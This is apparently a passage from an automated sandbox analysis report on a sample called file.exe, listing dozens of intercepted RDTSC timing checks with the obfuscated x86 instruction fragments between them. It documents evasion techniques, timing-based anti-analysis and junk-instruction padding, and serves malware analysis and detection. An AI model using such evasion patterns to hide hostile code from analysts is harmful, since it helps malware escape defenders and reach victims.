                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492037E second address: 4920384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920384 second address: 49203A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7AB12EBC94h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49203A4 second address: 49203AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49203AA second address: 49203AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49203AE second address: 49203B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49203B2 second address: 49203CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7B238F9EE1h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7AB12EBC8Bh 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49203CF second address: 49203D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49203D5 second address: 49203FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7AB12EBC92h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov ax, BF99h 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49203FD second address: 492042E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7AB0FF7766h 0x00000008 xor eax, 510F1328h 0x0000000e jmp 00007F7AB0FF775Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 mov edx, eax 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492042E second address: 4920454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F7B238F9E6Ch 0x00000010 pushad 0x00000011 push ecx 0x00000012 mov dl, 3Dh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920454 second address: 4920458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920458 second address: 492048A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [esi+44h] 0x0000000d jmp 00007F7AB12EBC96h 0x00000012 or edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov eax, edx 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492048A second address: 49204D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F7AB0FF7760h 0x00000014 jne 00007F7B23605928h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7AB0FF7767h 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49204D5 second address: 49204DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49204DB second address: 4920525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f jmp 00007F7AB0FF7766h 0x00000014 jne 00007F7B236058F1h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7AB0FF7767h 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49107FB second address: 4910836 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F7AB12EBC97h 0x0000000d jmp 00007F7AB12EBC93h 0x00000012 popfd 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910836 second address: 491083C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491083C second address: 4910841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910841 second address: 491085C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7AB0FF7761h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491085C second address: 49108A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F7AB12EBC93h 0x0000000b sbb cx, 5CCEh 0x00000010 jmp 00007F7AB12EBC99h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7AB12EBC8Dh 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49108A8 second address: 49108CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7AB0FF775Dh 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49108CF second address: 491090C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F7AB12EBC8Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 push esi 0x00000012 mov si, dx 0x00000015 pop ebx 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7AB12EBC8Ch 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491090C second address: 491091B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491091B second address: 491094E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F7AB12EBC8Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491094E second address: 4910952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910952 second address: 4910956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910956 second address: 491095C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491095C second address: 49109BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7AB12EBC95h 0x00000009 adc ecx, 15B7EE96h 0x0000000f jmp 00007F7AB12EBC91h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F7AB12EBC90h 0x0000001b adc esi, 6924AEB8h 0x00000021 jmp 00007F7AB12EBC8Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49109BA second address: 49109C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49109C0 second address: 4910A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 49DFh 0x00000007 mov edi, ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, dword ptr [ebp+08h] 0x0000000f jmp 00007F7AB12EBC8Eh 0x00000014 sub ebx, ebx 0x00000016 pushad 0x00000017 push edi 0x00000018 mov cx, 1119h 0x0000001c pop esi 0x0000001d mov dx, B1EAh 0x00000021 popad 0x00000022 test esi, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F7AB12EBC93h 0x0000002d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A04 second address: 4910A08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A08 second address: 4910A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A0E second address: 4910A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A14 second address: 4910A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F7B239015ECh 0x00000011 jmp 00007F7AB12EBC90h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A4B second address: 4910A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A4F second address: 4910A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A53 second address: 4910A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A59 second address: 4910A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, di 0x00000011 mov eax, ebx 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A7C second address: 4910A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910A82 second address: 4910AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7B2390159Fh 0x0000000e pushad 0x0000000f mov eax, 4CD17955h 0x00000014 pushfd 0x00000015 jmp 00007F7AB12EBC92h 0x0000001a xor ah, 00000028h 0x0000001d jmp 00007F7AB12EBC8Bh 0x00000022 popfd 0x00000023 popad 0x00000024 test byte ptr [76FB6968h], 00000002h 0x0000002b pushad 0x0000002c mov bx, ax 0x0000002f movzx eax, dx 0x00000032 popad 0x00000033 jne 00007F7B23901574h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F7AB12EBC95h 0x00000042 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910AE7 second address: 4910AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910AEB second address: 4910AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910AF1 second address: 4910B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F7AB0FF7760h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F7AB0FF775Ch 0x0000001a xor al, 00000048h 0x0000001d jmp 00007F7AB0FF775Bh 0x00000022 popfd 0x00000023 push ecx 0x00000024 pop edx 0x00000025 popad 0x00000026 mov di, cx 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F7AB0FF7763h 0x00000034 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910B52 second address: 4910B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910B6F second address: 4910B74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910B74 second address: 4910C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 28341820h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F7AB12EBC8Fh 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F7AB12EBC96h 0x00000018 push eax 0x00000019 jmp 00007F7AB12EBC8Bh 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F7AB12EBC96h 0x00000024 push dword ptr [ebp+14h] 0x00000027 jmp 00007F7AB12EBC90h 0x0000002c push dword ptr [ebp+10h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F7AB12EBC8Dh 0x00000038 or ax, 8496h 0x0000003d jmp 00007F7AB12EBC91h 0x00000042 popfd 0x00000043 call 00007F7AB12EBC90h 0x00000048 pop eax 0x00000049 popad 0x0000004a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910C1A second address: 4910C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4910C32 second address: 4910C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, CEh 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920EC3 second address: 4920F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7AB0FF775Bh 0x00000013 adc ecx, 231CAA9Eh 0x00000019 jmp 00007F7AB0FF7769h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920C59 second address: 4920C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, F2h 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920C60 second address: 4920C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920C66 second address: 4920C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920C6A second address: 4920C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920C6E second address: 4920C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F7AB12EBC8Bh 0x00000011 jmp 00007F7AB12EBC98h 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4920C9E second address: 4920CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7AB0FF7761h 0x00000008 pushfd 0x00000009 jmp 00007F7AB0FF7760h 0x0000000e sbb ecx, 06C2D5C8h 0x00000014 jmp 00007F7AB0FF775Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 jmp 00007F7AB0FF7766h 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov ax, 93C3h 0x0000002e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0779 second address: 49A0789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB12EBC8Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0789 second address: 49A07C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7AB0FF775Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F7AB0FF7760h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7AB0FF775Ch 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07C2 second address: 49A07CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov ebx, ecx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499094F second address: 4990955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990955 second address: 4990959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990959 second address: 499095D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499095D second address: 49909B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7AB12EBC91h 0x00000012 sub eax, 01C12826h 0x00000018 jmp 00007F7AB12EBC91h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F7AB12EBC90h 0x00000024 or cx, 11C8h 0x00000029 jmp 00007F7AB12EBC8Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49909B6 second address: 49909CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB0FF7764h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49909CE second address: 49909D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49909D2 second address: 4990A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7AB0FF7767h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push esi 0x00000014 pop edx 0x00000015 jmp 00007F7AB0FF775Ch 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007F7AB0FF7763h 0x00000027 sub ax, 8B7Eh 0x0000002c jmp 00007F7AB0FF7769h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990A40 second address: 4990A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990A46 second address: 4990A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49907D1 second address: 4990805 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 0499C560h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F7AB12EBC96h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 jmp 00007F7AB12EBC8Eh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930284 second address: 4930293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4930293 second address: 49302C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7AB12EBC8Dh 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49302C1 second address: 49302DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, si 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990BDC second address: 4990BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB12EBC94h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990BF4 second address: 4990BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990BF8 second address: 4990C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F7AB12EBC8Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov dx, ax 0x00000015 pushad 0x00000016 mov ah, A9h 0x00000018 pushfd 0x00000019 jmp 00007F7AB12EBC95h 0x0000001e and ecx, 327380E6h 0x00000024 jmp 00007F7AB12EBC91h 0x00000029 popfd 0x0000002a popad 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f push eax 0x00000030 mov ebx, 29E15B6Eh 0x00000035 pop ebx 0x00000036 mov esi, 6442502Bh 0x0000003b popad 0x0000003c push dword ptr [ebp+0Ch] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F7AB12EBC8Dh 0x00000046 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990C69 second address: 4990C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990C6F second address: 4990C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990C73 second address: 4990C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop eax 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990C98 second address: 4990CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 2C8759D9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990CBE second address: 4990CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F7AB0FF7768h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990CDC second address: 4990CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
